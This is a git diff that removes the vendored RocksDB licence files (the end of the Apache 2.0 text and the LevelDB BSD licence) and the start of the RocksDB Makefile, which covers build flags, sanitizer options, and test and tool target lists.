-      outstanding shares, or (iii) beneficial ownership of such entity.
-
-      "You" (or "Your") shall mean an individual or Legal Entity
-      exercising permissions granted by this License.
-
-      "Source" form shall mean the preferred form for making modifications,
-      including but not limited to software source code, documentation
-      source, and configuration files.
-
-      "Object" form shall mean any form resulting from mechanical
-      transformation or translation of a Source form, including but
-      not limited to compiled object code, generated documentation,
-      and conversions to other media types.
-
-      "Work" shall mean the work of authorship, whether in Source or
-      Object form, made available under the License, as indicated by a
-      copyright notice that is included in or attached to the work
-      (an example is provided in the Appendix below).
-
-      "Derivative Works" shall mean any work, whether in Source or Object
-      form, that is based on (or derived from) the Work and for which the
-      editorial revisions, annotations, elaborations, or other modifications
-      represent, as a whole, an original work of authorship. For the purposes
-      of this License, Derivative Works shall not include works that remain
-      separable from, or merely link (or bind by name) to the interfaces of,
-      the Work and Derivative Works thereof.
-
-      "Contribution" shall mean any work of authorship, including
-      the original version of the Work and any modifications or additions
-      to that Work or Derivative Works thereof, that is intentionally
-      submitted to Licensor for inclusion in the Work by the copyright owner
-      or by an individual or Legal Entity authorized to submit on behalf of
-      the copyright owner. For the purposes of this definition, "submitted"
-      means any form of electronic, verbal, or written communication sent
-      to the Licensor or its representatives, including but not limited to
-      communication on electronic mailing lists, source code control systems,
-      and issue tracking systems that are managed by, or on behalf of, the
-      Licensor for the purpose of discussing and improving the Work, but
-      excluding communication that is conspicuously marked or otherwise
-      designated in writing by the copyright owner as "Not a Contribution."
-
-      "Contributor" shall mean Licensor and any individual or Legal Entity
-      on behalf of whom a Contribution has been received by Licensor and
-      subsequently incorporated within the Work.
-
-   2. Grant of Copyright License. Subject to the terms and conditions of
-      this License, each Contributor hereby grants to You a perpetual,
-      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
-      copyright license to reproduce, prepare Derivative Works of,
-      publicly display, publicly perform, sublicense, and distribute the
-      Work and such Derivative Works in Source or Object form.
-
-   3. Grant of Patent License. Subject to the terms and conditions of
-      this License, each Contributor hereby grants to You a perpetual,
-      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
-      (except as stated in this section) patent license to make, have made,
-      use, offer to sell, sell, import, and otherwise transfer the Work,
-      where such license applies only to those patent claims licensable
-      by such Contributor that are necessarily infringed by their
-      Contribution(s) alone or by combination of their Contribution(s)
-      with the Work to which such Contribution(s) was submitted. If You
-      institute patent litigation against any entity (including a
-      cross-claim or counterclaim in a lawsuit) alleging that the Work
-      or a Contribution incorporated within the Work constitutes direct
-      or contributory patent infringement, then any patent licenses
-      granted to You under this License for that Work shall terminate
-      as of the date such litigation is filed.
-
-   4. Redistribution. You may reproduce and distribute copies of the
-      Work or Derivative Works thereof in any medium, with or without
-      modifications, and in Source or Object form, provided that You
-      meet the following conditions:
-
-      (a) You must give any other recipients of the Work or
-          Derivative Works a copy of this License; and
-
-      (b) You must cause any modified files to carry prominent notices
-          stating that You changed the files; and
-
-      (c) You must retain, in the Source form of any Derivative Works
-          that You distribute, all copyright, patent, trademark, and
-          attribution notices from the Source form of the Work,
-          excluding those notices that do not pertain to any part of
-          the Derivative Works; and
-
-      (d) If the Work includes a "NOTICE" text file as part of its
-          distribution, then any Derivative Works that You distribute must
-          include a readable copy of the attribution notices contained
-          within such NOTICE file, excluding those notices that do not
-          pertain to any part of the Derivative Works, in at least one
-          of the following places: within a NOTICE text file distributed
-          as part of the Derivative Works; within the Source form or
-          documentation, if provided along with the Derivative Works; or,
-          within a display generated by the Derivative Works, if and
-          wherever such third-party notices normally appear. The contents
-          of the NOTICE file are for informational purposes only and
-          do not modify the License. You may add Your own attribution
-          notices within Derivative Works that You distribute, alongside
-          or as an addendum to the NOTICE text from the Work, provided
-          that such additional attribution notices cannot be construed
-          as modifying the License.
-
-      You may add Your own copyright statement to Your modifications and
-      may provide additional or different license terms and conditions
-      for use, reproduction, or distribution of Your modifications, or
-      for any such Derivative Works as a whole, provided Your use,
-      reproduction, and distribution of the Work otherwise complies with
-      the conditions stated in this License.
-
-   5. Submission of Contributions. Unless You explicitly state otherwise,
-      any Contribution intentionally submitted for inclusion in the Work
-      by You to the Licensor shall be under the terms and conditions of
-      this License, without any additional terms or conditions.
-      Notwithstanding the above, nothing herein shall supersede or modify
-      the terms of any separate license agreement you may have executed
-      with Licensor regarding such Contributions.
-
-   6. Trademarks. This License does not grant permission to use the trade
-      names, trademarks, service marks, or product names of the Licensor,
-      except as required for reasonable and customary use in describing the
-      origin of the Work and reproducing the content of the NOTICE file.
-
-   7. Disclaimer of Warranty. Unless required by applicable law or
-      agreed to in writing, Licensor provides the Work (and each
-      Contributor provides its Contributions) on an "AS IS" BASIS,
-      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
-      implied, including, without limitation, any warranties or conditions
-      of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
-      PARTICULAR PURPOSE. You are solely responsible for determining the
-      appropriateness of using or redistributing the Work and assume any
-      risks associated with Your exercise of permissions under this License.
-
-   8. Limitation of Liability. In no event and under no legal theory,
-      whether in tort (including negligence), contract, or otherwise,
-      unless required by applicable law (such as deliberate and grossly
-      negligent acts) or agreed to in writing, shall any Contributor be
-      liable to You for damages, including any direct, indirect, special,
-      incidental, or consequential damages of any character arising as a
-      result of this License or out of the use or inability to use the
-      Work (including but not limited to damages for loss of goodwill,
-      work stoppage, computer failure or malfunction, or any and all
-      other commercial damages or losses), even if such Contributor
-      has been advised of the possibility of such damages.
-
-   9. Accepting Warranty or Additional Liability. While redistributing
-      the Work or Derivative Works thereof, You may choose to offer,
-      and charge a fee for, acceptance of support, warranty, indemnity,
-      or other liability obligations and/or rights consistent with this
-      License. However, in accepting such obligations, You may act only
-      on Your own behalf and on Your sole responsibility, not on behalf
-      of any other Contributor, and only if You agree to indemnify,
-      defend, and hold each Contributor harmless for any liability
-      incurred by, or claims asserted against, such Contributor by reason
-      of your accepting any such warranty or additional liability.
-
-   END OF TERMS AND CONDITIONS
-
-   APPENDIX: How to apply the Apache License to your work.
-
-      To apply the Apache License to your work, attach the following
-      boilerplate notice, with the fields enclosed by brackets "[]"
-      replaced with your own identifying information. (Don't include
-      the brackets!)  The text should be enclosed in the appropriate
-      comment syntax for the file format. We also recommend that a
-      file or class name and description of purpose be included on the
-      same "printed page" as the copyright notice for easier
-      identification within third-party archives.
-
-   Copyright [yyyy] [name of copyright owner]
-
-   Licensed under the Apache License, Version 2.0 (the "License");
-   you may not use this file except in compliance with the License.
-   You may obtain a copy of the License at
-
-       http://www.apache.org/licenses/LICENSE-2.0
-
-   Unless required by applicable law or agreed to in writing, software
-   distributed under the License is distributed on an "AS IS" BASIS,
-   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-   See the License for the specific language governing permissions and
-   limitations under the License.
diff --git a/thirdparty/rocksdb/LICENSE.leveldb b/thirdparty/rocksdb/LICENSE.leveldb
deleted file mode 100644
index 7108b0b..0000000
--- a/thirdparty/rocksdb/LICENSE.leveldb
+++ /dev/null
@@ -1,29 +0,0 @@
-This contains code that is from LevelDB, and that code is under the following license:
-
-Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-
-Redistribution and use in source and binary forms, with or without
-modification, are permitted provided that the following conditions are
-met:
-
-   * Redistributions of source code must retain the above copyright
-notice, this list of conditions and the following disclaimer.
-   * Redistributions in binary form must reproduce the above
-copyright notice, this list of conditions and the following disclaimer
-in the documentation and/or other materials provided with the
-distribution.
-   * Neither the name of Google Inc. nor the names of its
-contributors may be used to endorse or promote products derived from
-this software without specific prior written permission.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
diff --git a/thirdparty/rocksdb/Makefile b/thirdparty/rocksdb/Makefile
deleted file mode 100644
index 5a89f6b..0000000
--- a/thirdparty/rocksdb/Makefile
+++ /dev/null
@@ -1,1769 +0,0 @@
-# Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-# Use of this source code is governed by a BSD-style license that can be
-# found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-# Inherit some settings from environment variables, if available
-
-#-----------------------------------------------
-
-BASH_EXISTS := $(shell which bash)
-SHELL := $(shell which bash)
-
-CLEAN_FILES = # deliberately empty, so we can append below.
-CFLAGS += ${EXTRA_CFLAGS}
-CXXFLAGS += ${EXTRA_CXXFLAGS}
-LDFLAGS += $(EXTRA_LDFLAGS)
-MACHINE ?= $(shell uname -m)
-ARFLAGS = ${EXTRA_ARFLAGS} rs
-STRIPFLAGS = -S -x
-
-# Transform parallel LOG output into something more readable.
-perl_command = perl -n \
-  -e '@a=split("\t",$$_,-1); $$t=$$a[8];'				\
-  -e '$$t =~ /.*if\s\[\[\s"(.*?\.[\w\/]+)/ and $$t=$$1;'		\
-  -e '$$t =~ s,^\./,,;'							\
-  -e '$$t =~ s, >.*,,; chomp $$t;'					\
-  -e '$$t =~ /.*--gtest_filter=(.*?\.[\w\/]+)/ and $$t=$$1;'		\
-  -e 'printf "%7.3f %s %s\n", $$a[3], $$a[6] == 0 ? "PASS" : "FAIL", $$t'
-quoted_perl_command = $(subst ','\'',$(perl_command))
-
-# DEBUG_LEVEL can have three values:
-# * DEBUG_LEVEL=2; this is the ultimate debug mode. It will compile rocksdb
-# without any optimizations. To compile with level 2, issue `make dbg`
-# * DEBUG_LEVEL=1; debug level 1 enables all assertions and debug code, but
-# compiles rocksdb with -O2 optimizations. this is the default debug level.
-# `make all` or `make <binary_target>` compile RocksDB with debug level 1.
-# We use this debug level when developing RocksDB.
-# * DEBUG_LEVEL=0; this is the debug level we use for release. If you're
-# running rocksdb in production you most definitely want to compile RocksDB
-# with debug level 0. To compile with level 0, run `make shared_lib`,
-# `make install-shared`, `make static_lib`, `make install-static` or
-# `make install`
-
-# Set the default DEBUG_LEVEL to 1
-DEBUG_LEVEL?=1
-
-ifeq ($(MAKECMDGOALS),dbg)
-	DEBUG_LEVEL=2
-endif
-
-ifeq ($(MAKECMDGOALS),clean)
-	DEBUG_LEVEL=0
-endif
-
-ifeq ($(MAKECMDGOALS),release)
-	DEBUG_LEVEL=0
-endif
-
-ifeq ($(MAKECMDGOALS),shared_lib)
-	DEBUG_LEVEL=0
-endif
-
-ifeq ($(MAKECMDGOALS),install-shared)
-	DEBUG_LEVEL=0
-endif
-
-ifeq ($(MAKECMDGOALS),static_lib)
-	DEBUG_LEVEL=0
-endif
-
-ifeq ($(MAKECMDGOALS),install-static)
-	DEBUG_LEVEL=0
-endif
-
-ifeq ($(MAKECMDGOALS),install)
-	DEBUG_LEVEL=0
-endif
-
-ifeq ($(MAKECMDGOALS),rocksdbjavastatic)
-	DEBUG_LEVEL=0
-endif
-
-ifeq ($(MAKECMDGOALS),rocksdbjavastaticrelease)
-	DEBUG_LEVEL=0
-endif
-
-ifeq ($(MAKECMDGOALS),rocksdbjavastaticpublish)
-	DEBUG_LEVEL=0
-endif
-
-# compile with -O2 if debug level is not 2
-ifneq ($(DEBUG_LEVEL), 2)
-OPT += -O2 -fno-omit-frame-pointer
-# Skip for archs that don't support -momit-leaf-frame-pointer
-ifeq (,$(shell $(CXX) -fsyntax-only -momit-leaf-frame-pointer -xc /dev/null 2>&1))
-OPT += -momit-leaf-frame-pointer
-endif
-endif
-
-# if we're compiling for release, compile without debug code (-DNDEBUG) and
-# don't treat warnings as errors
-ifeq ($(DEBUG_LEVEL),0)
-OPT += -DNDEBUG
-DISABLE_WARNING_AS_ERROR=1
-
-ifneq ($(USE_RTTI), 1)
-	CXXFLAGS += -fno-rtti
-else
-	CXXFLAGS += -DROCKSDB_USE_RTTI
-endif
-else
-ifneq ($(USE_RTTI), 0)
-	CXXFLAGS += -DROCKSDB_USE_RTTI
-else
-	CXXFLAGS += -fno-rtti
-endif
-
-$(warning Warning: Compiling in debug mode. Don't use the resulting binary in production)
-endif
-
-#-----------------------------------------------
-include src.mk
-
-AM_DEFAULT_VERBOSITY = 0
-
-AM_V_GEN = $(am__v_GEN_$(V))
-am__v_GEN_ = $(am__v_GEN_$(AM_DEFAULT_VERBOSITY))
-am__v_GEN_0 = @echo "  GEN     " $@;
-am__v_GEN_1 =
-AM_V_at = $(am__v_at_$(V))
-am__v_at_ = $(am__v_at_$(AM_DEFAULT_VERBOSITY))
-am__v_at_0 = @
-am__v_at_1 =
-
-AM_V_CC = $(am__v_CC_$(V))
-am__v_CC_ = $(am__v_CC_$(AM_DEFAULT_VERBOSITY))
-am__v_CC_0 = @echo "  CC      " $@;
-am__v_CC_1 =
-CCLD = $(CC)
-LINK = $(CCLD) $(AM_CFLAGS) $(CFLAGS) $(AM_LDFLAGS) $(LDFLAGS) -o $@
-AM_V_CCLD = $(am__v_CCLD_$(V))
-am__v_CCLD_ = $(am__v_CCLD_$(AM_DEFAULT_VERBOSITY))
-am__v_CCLD_0 = @echo "  CCLD    " $@;
-am__v_CCLD_1 =
-AM_V_AR = $(am__v_AR_$(V))
-am__v_AR_ = $(am__v_AR_$(AM_DEFAULT_VERBOSITY))
-am__v_AR_0 = @echo "  AR      " $@;
-am__v_AR_1 =
-
-ifdef ROCKSDB_USE_LIBRADOS
-LIB_SOURCES += utilities/env_librados.cc
-LDFLAGS += -lrados
-endif
-
-AM_LINK = $(AM_V_CCLD)$(CXX) $^ $(EXEC_LDFLAGS) -o $@ $(LDFLAGS) $(COVERAGEFLAGS)
-# detect what platform we're building on
-dummy := $(shell (export ROCKSDB_ROOT="$(CURDIR)"; export PORTABLE="$(PORTABLE)"; "$(CURDIR)/build_tools/build_detect_platform" "$(CURDIR)/make_config.mk"))
-# this file is generated by the previous line to set build flags and sources
-include make_config.mk
-CLEAN_FILES += make_config.mk
-
-missing_make_config_paths := $(shell				\
-	grep "\/\S*" -o $(CURDIR)/make_config.mk | 		\
-	while read path;					\
-		do [ -e $$path ] || echo $$path; 		\
-	done | sort | uniq)
-
-$(foreach path, $(missing_make_config_paths), \
-	$(warning Warning: $(path) dont exist))
-
-ifeq ($(PLATFORM), OS_AIX)
-# no debug info
-else ifneq ($(PLATFORM), IOS)
-CFLAGS += -g
-CXXFLAGS += -g
-else
-# no debug info for IOS, that will make our library big
-OPT += -DNDEBUG
-endif
-
-ifeq ($(PLATFORM), OS_AIX)
-ARFLAGS = -X64 rs
-STRIPFLAGS = -X64 -x
-endif
-
-ifeq ($(PLATFORM), OS_SOLARIS)
-	PLATFORM_CXXFLAGS += -D _GLIBCXX_USE_C99
-endif
-ifneq ($(filter -DROCKSDB_LITE,$(OPT)),)
-	# found
-	CFLAGS += -fno-exceptions
-	CXXFLAGS += -fno-exceptions
-	# LUA is not supported under ROCKSDB_LITE
-	LUA_PATH =
-endif
-
-# ASAN doesn't work well with jemalloc. If we're compiling with ASAN, we should use regular malloc.
-ifdef COMPILE_WITH_ASAN
-	DISABLE_JEMALLOC=1
-	EXEC_LDFLAGS += -fsanitize=address
-	PLATFORM_CCFLAGS += -fsanitize=address
-	PLATFORM_CXXFLAGS += -fsanitize=address
-endif
-
-# TSAN doesn't work well with jemalloc. If we're compiling with TSAN, we should use regular malloc.
-ifdef COMPILE_WITH_TSAN
-	DISABLE_JEMALLOC=1
-	EXEC_LDFLAGS += -fsanitize=thread
-	PLATFORM_CCFLAGS += -fsanitize=thread -fPIC
-	PLATFORM_CXXFLAGS += -fsanitize=thread -fPIC
-        # Turn off -pg when enabling TSAN testing, because that induces
-        # a link failure.  TODO: find the root cause
-	PROFILING_FLAGS =
-	# LUA is not supported under TSAN
-	LUA_PATH =
-endif
-
-# AIX doesn't work with -pg
-ifeq ($(PLATFORM), OS_AIX)
-	PROFILING_FLAGS =
-endif
-
-# USAN doesn't work well with jemalloc. If we're compiling with USAN, we should use regular malloc.
-ifdef COMPILE_WITH_UBSAN
-	DISABLE_JEMALLOC=1
-	EXEC_LDFLAGS += -fsanitize=undefined
-	PLATFORM_CCFLAGS += -fsanitize=undefined -DROCKSDB_UBSAN_RUN
-	PLATFORM_CXXFLAGS += -fsanitize=undefined -DROCKSDB_UBSAN_RUN
-endif
-
-ifndef DISABLE_JEMALLOC
-	ifdef JEMALLOC
-		PLATFORM_CXXFLAGS += -DROCKSDB_JEMALLOC -DJEMALLOC_NO_DEMANGLE
-		PLATFORM_CCFLAGS  += -DROCKSDB_JEMALLOC -DJEMALLOC_NO_DEMANGLE
-	endif
-	ifdef WITH_JEMALLOC_FLAG
-		PLATFORM_LDFLAGS += -ljemalloc
-		JAVA_LDFLAGS += -ljemalloc
-	endif
-	EXEC_LDFLAGS := $(JEMALLOC_LIB) $(EXEC_LDFLAGS)
-	PLATFORM_CXXFLAGS += $(JEMALLOC_INCLUDE)
-	PLATFORM_CCFLAGS += $(JEMALLOC_INCLUDE)
-endif
-
-export GTEST_THROW_ON_FAILURE=1
-export GTEST_HAS_EXCEPTIONS=1
-GTEST_DIR = ./third-party/gtest-1.7.0/fused-src
-# AIX: pre-defined system headers are surrounded by an extern "C" block
-ifeq ($(PLATFORM), OS_AIX)
-	PLATFORM_CCFLAGS += -I$(GTEST_DIR)
-	PLATFORM_CXXFLAGS += -I$(GTEST_DIR)
-else
-	PLATFORM_CCFLAGS += -isystem $(GTEST_DIR)
-	PLATFORM_CXXFLAGS += -isystem $(GTEST_DIR)
-endif
-
-# This (the first rule) must depend on "all".
-default: all
-
-WARNING_FLAGS = -W -Wextra -Wall -Wsign-compare -Wshadow \
-  -Wno-unused-parameter
-
-ifndef DISABLE_WARNING_AS_ERROR
-	WARNING_FLAGS += -Werror
-endif
-
-
-ifdef LUA_PATH
-
-ifndef LUA_INCLUDE
-LUA_INCLUDE=$(LUA_PATH)/include
-endif
-
-LUA_INCLUDE_FILE=$(LUA_INCLUDE)/lualib.h
-
-ifeq ("$(wildcard $(LUA_INCLUDE_FILE))", "")
-# LUA_INCLUDE_FILE does not exist
-$(error Cannot find lualib.h under $(LUA_INCLUDE).  Try to specify both LUA_PATH and LUA_INCLUDE manually)
-endif
-LUA_FLAGS = -I$(LUA_INCLUDE) -DLUA -DLUA_COMPAT_ALL
-CFLAGS += $(LUA_FLAGS)
-CXXFLAGS += $(LUA_FLAGS)
-
-ifndef LUA_LIB
-LUA_LIB = $(LUA_PATH)/lib/liblua.a
-endif
-ifeq ("$(wildcard $(LUA_LIB))", "") # LUA_LIB does not exist
-$(error $(LUA_LIB) does not exist.  Try to specify both LUA_PATH and LUA_LIB manually)
-endif
-LDFLAGS += $(LUA_LIB)
-
-endif
-
-
-CFLAGS += $(WARNING_FLAGS) -I. -I./include $(PLATFORM_CCFLAGS) $(OPT)
-CXXFLAGS += $(WARNING_FLAGS) -I. -I./include $(PLATFORM_CXXFLAGS) $(OPT) -Woverloaded-virtual -Wnon-virtual-dtor -Wno-missing-field-initializers
-
-LDFLAGS += $(PLATFORM_LDFLAGS)
-
-# If NO_UPDATE_BUILD_VERSION is set we don't update util/build_version.cc, but
-# the file needs to already exist or else the build will fail
-ifndef NO_UPDATE_BUILD_VERSION
-date := $(shell date +%F)
-ifdef FORCE_GIT_SHA
-	git_sha := $(FORCE_GIT_SHA)
-else
-	git_sha := $(shell git rev-parse HEAD 2>/dev/null)
-endif
-gen_build_version = sed -e s/@@GIT_SHA@@/$(git_sha)/ -e s/@@GIT_DATE_TIME@@/$(date)/ util/build_version.cc.in
-
-# Record the version of the source that we are compiling.
-# We keep a record of the git revision in this file.  It is then built
-# as a regular source file as part of the compilation process.
-# One can run "strings executable_filename | grep _build_" to find
-# the version of the source that we used to build the executable file.
-FORCE:
-util/build_version.cc: FORCE
-	$(AM_V_GEN)rm -f $@-t
-	$(AM_V_at)$(gen_build_version) > $@-t
-	$(AM_V_at)if test -f $@; then					\
-	  cmp -s $@-t $@ && rm -f $@-t || mv -f $@-t $@;		\
-	else mv -f $@-t $@; fi
-endif
-
-LIBOBJECTS = $(LIB_SOURCES:.cc=.o)
-LIBOBJECTS += $(TOOL_LIB_SOURCES:.cc=.o)
-MOCKOBJECTS = $(MOCK_LIB_SOURCES:.cc=.o)
-
-GTEST = $(GTEST_DIR)/gtest/gtest-all.o
-TESTUTIL = ./util/testutil.o
-TESTHARNESS = ./util/testharness.o $(TESTUTIL) $(MOCKOBJECTS) $(GTEST)
-VALGRIND_ERROR = 2
-VALGRIND_VER := $(join $(VALGRIND_VER),valgrind)
-
-VALGRIND_OPTS = --error-exitcode=$(VALGRIND_ERROR) --leak-check=full
-
-BENCHTOOLOBJECTS = $(BENCH_LIB_SOURCES:.cc=.o) $(LIBOBJECTS) $(TESTUTIL)
-
-EXPOBJECTS = $(EXP_LIB_SOURCES:.cc=.o) $(LIBOBJECTS) $(TESTUTIL)
-
-TESTS = \
-	db_basic_test \
-	db_encryption_test \
-	db_test2 \
-	external_sst_file_basic_test \
-	auto_roll_logger_test \
-	bloom_test \
-	dynamic_bloom_test \
-	c_test \
-	checkpoint_test \
-	crc32c_test \
-	coding_test \
-	inlineskiplist_test \
-	env_basic_test \
-	env_test \
-	hash_test \
-	thread_local_test \
-	rate_limiter_test \
-	perf_context_test \
-	iostats_context_test \
-	db_wal_test \
-	db_block_cache_test \
-	db_test \
-	db_blob_index_test \
-	db_bloom_filter_test \
-	db_iter_test \
-	db_log_iter_test \
-	db_compaction_filter_test \
-	db_compaction_test \
-	db_dynamic_level_test \
-	db_flush_test \
-	db_inplace_update_test \
-	db_iterator_test \
-	db_memtable_test \
-	db_merge_operator_test \
-	db_options_test \
-	db_range_del_test \
-	db_sst_test \
-	db_tailing_iter_test \
-	db_universal_compaction_test \
-	db_io_failure_test \
-	db_properties_test \
-	db_table_properties_test \
-	db_statistics_test \
-	db_write_test \
-	autovector_test \
-	blob_db_test \
-	cleanable_test \
-	column_family_test \
-	table_properties_collector_test \
-	arena_test \
-	block_test \
-	cache_test \
-	corruption_test \
-	slice_transform_test \
-	dbformat_test \
-	fault_injection_test \
-	filelock_test \
-	filename_test \
-	file_reader_writer_test \
-	block_based_filter_block_test \
-	full_filter_block_test \
-	partitioned_filter_block_test \
-	hash_table_test \
-	histogram_test \
-	log_test \
-	manual_compaction_test \
-	mock_env_test \
-	memtable_list_test \
-	merge_helper_test \
-	memory_test \
-	merge_test \
-	merger_test \
-	util_merge_operators_test \
-	options_file_test \
-	redis_test \
-	reduce_levels_test \
-	plain_table_db_test \
-	comparator_db_test \
-	external_sst_file_test \
-	prefix_test \
-	skiplist_test \
-	write_buffer_manager_test \
-	stringappend_test \
-	cassandra_format_test \
-	cassandra_functional_test \
-	cassandra_row_merge_test \
-	cassandra_serialize_test \
-	ttl_test \
-	date_tiered_test \
-	backupable_db_test \
-	document_db_test \
-	json_document_test \
-	sim_cache_test \
-	spatial_db_test \
-	version_edit_test \
-	version_set_test \
-	compaction_picker_test \
-	version_builder_test \
-	file_indexer_test \
-	write_batch_test \
-	write_batch_with_index_test \
-	write_controller_test\
-	deletefile_test \
-	table_test \
-	geodb_test \
-	delete_scheduler_test \
-	options_test \
-	options_settable_test \
-	options_util_test \
-	event_logger_test \
-	timer_queue_test \
-	cuckoo_table_builder_test \
-	cuckoo_table_reader_test \
-	cuckoo_table_db_test \
-	flush_job_test \
-	wal_manager_test \
-	listener_test \
-	compaction_iterator_test \
-	compaction_job_test \
-	thread_list_test \
-	sst_dump_test \
-	column_aware_encoding_test \
-	compact_files_test \
-	optimistic_transaction_test \
-	write_callback_test \
-	heap_test \
-	compact_on_deletion_collector_test \
-	compaction_job_stats_test \
-	option_change_migration_test \
-	transaction_test \
-	ldb_cmd_test \
-	persistent_cache_test \
-	statistics_test \
-	lua_test \
-	range_del_aggregator_test \
-	lru_cache_test \
-	object_registry_test \
-	repair_test \
-	env_timed_test \
-
-PARALLEL_TEST = \
-	backupable_db_test \
-	db_compaction_filter_test \
-	db_compaction_test \
-	db_sst_test \
-	db_test \
-	db_universal_compaction_test \
-	db_wal_test \
-	external_sst_file_test \
-	fault_injection_test \
-	inlineskiplist_test \
-	manual_compaction_test \
-	persistent_cache_test \
-	table_test \
-	transaction_test
-
-SUBSET := $(TESTS)
-ifdef ROCKSDBTESTS_START
-        SUBSET := $(shell echo $(SUBSET) | sed 's/^.*$(ROCKSDBTESTS_START)/$(ROCKSDBTESTS_START)/')
-endif
-
-ifdef ROCKSDBTESTS_END
-        SUBSET := $(shell echo $(SUBSET) | sed 's/$(ROCKSDBTESTS_END).*//')
-endif
-
-TOOLS = \
-	sst_dump \
-	db_sanity_test \
-	db_stress \
-	write_stress \
-	ldb \
-	db_repl_stress \
-	rocksdb_dump \
-	rocksdb_undump \
-	blob_dump \
-
-TEST_LIBS = \
-	librocksdb_env_basic_test.a
-
-# TODO: add back forward_iterator_bench, after making it build in all environemnts.
-BENCHMARKS = db_bench table_reader_bench cache_bench memtablerep_bench column_aware_encoding_exp persistent_cache_bench
-
-# if user didn't config LIBNAME, set the default
-ifeq ($(LIBNAME),)
-# we should only run rocksdb in production with DEBUG_LEVEL 0
-ifeq ($(DEBUG_LEVEL),0)
-        LIBNAME=librocksdb
-else
-        LIBNAME=librocksdb_debug
-endif
-endif
-LIBRARY = ${LIBNAME}.a
-TOOLS_LIBRARY = ${LIBNAME}_tools.a
-
-ROCKSDB_MAJOR = $(shell egrep "ROCKSDB_MAJOR.[0-9]" include/rocksdb/version.h | cut -d ' ' -f 3)
-ROCKSDB_MINOR = $(shell egrep "ROCKSDB_MINOR.[0-9]" include/rocksdb/version.h | cut -d ' ' -f 3)
-ROCKSDB_PATCH = $(shell egrep "ROCKSDB_PATCH.[0-9]" include/rocksdb/version.h | cut -d ' ' -f 3)
-
-default: all
-
-#-----------------------------------------------
-# Create platform independent shared libraries.
-#-----------------------------------------------
-ifneq ($(PLATFORM_SHARED_EXT),)
-
-ifneq ($(PLATFORM_SHARED_VERSIONED),true)
-SHARED1 = ${LIBNAME}.$(PLATFORM_SHARED_EXT)
-SHARED2 = $(SHARED1)
-SHARED3 = $(SHARED1)
-SHARED4 = $(SHARED1)
-SHARED = $(SHARED1)
-else
-SHARED_MAJOR = $(ROCKSDB_MAJOR)
-SHARED_MINOR = $(ROCKSDB_MINOR)
-SHARED_PATCH = $(ROCKSDB_PATCH)
-SHARED1 = ${LIBNAME}.$(PLATFORM_SHARED_EXT)
-ifeq ($(PLATFORM), OS_MACOSX)
-SHARED_OSX = $(LIBNAME).$(SHARED_MAJOR)
-SHARED2 = $(SHARED_OSX).$(PLATFORM_SHARED_EXT)
-SHARED3 = $(SHARED_OSX).$(SHARED_MINOR).$(PLATFORM_SHARED_EXT)
-SHARED4 = $(SHARED_OSX).$(SHARED_MINOR).$(SHARED_PATCH).$(PLATFORM_SHARED_EXT)
-else
-SHARED2 = $(SHARED1).$(SHARED_MAJOR)
-SHARED3 = $(SHARED1).$(SHARED_MAJOR).$(SHARED_MINOR)
-SHARED4 = $(SHARED1).$(SHARED_MAJOR).$(SHARED_MINOR).$(SHARED_PATCH)
-endif
-SHARED = $(SHARED1) $(SHARED2) $(SHARED3) $(SHARED4)
-$(SHARED1): $(SHARED4)
-	ln -fs $(SHARED4) $(SHARED1)
-$(SHARED2): $(SHARED4)
-	ln -fs $(SHARED4) $(SHARED2)
-$(SHARED3): $(SHARED4)
-	ln -fs $(SHARED4) $(SHARED3)
-endif
-
-shared_libobjects = $(patsubst %,shared-objects/%,$(LIBOBJECTS))
-CLEAN_FILES += shared-objects
-
-$(shared_libobjects): shared-objects/%.o: %.cc
-	$(AM_V_CC)mkdir -p $(@D) && $(CXX) $(CXXFLAGS) $(PLATFORM_SHARED_CFLAGS) -c $< -o $@
-
-$(SHARED4): $(shared_libobjects)
-	$(CXX) $(PLATFORM_SHARED_LDFLAGS)$(SHARED3) $(CXXFLAGS) $(PLATFORM_SHARED_CFLAGS) $(shared_libobjects) $(LDFLAGS) -o $@
-
-endif  # PLATFORM_SHARED_EXT
-
-.PHONY: blackbox_crash_test check clean coverage crash_test ldb_tests package \
-	release tags valgrind_check whitebox_crash_test format static_lib shared_lib all \
-	dbg rocksdbjavastatic rocksdbjava install install-static install-shared uninstall \
-	analyze tools tools_lib
-
-
-all: $(LIBRARY) $(BENCHMARKS) tools tools_lib test_libs $(TESTS)
-
-all_but_some_tests: $(LIBRARY) $(BENCHMARKS) tools tools_lib test_libs $(SUBSET)
-
-static_lib: $(LIBRARY)
-
-shared_lib: $(SHARED)
-
-tools: $(TOOLS)
-
-tools_lib: $(TOOLS_LIBRARY)
-
-test_libs: $(TEST_LIBS)
-
-dbg: $(LIBRARY) $(BENCHMARKS) tools $(TESTS)
-
-# creates static library and programs
-release:
-	$(MAKE) clean
-	DEBUG_LEVEL=0 $(MAKE) static_lib tools db_bench
-
-coverage:
-	$(MAKE) clean
-	COVERAGEFLAGS="-fprofile-arcs -ftest-coverage" LDFLAGS+="-lgcov" $(MAKE) J=1 all check
-	cd coverage && ./coverage_test.sh
-        # Delete intermediate files
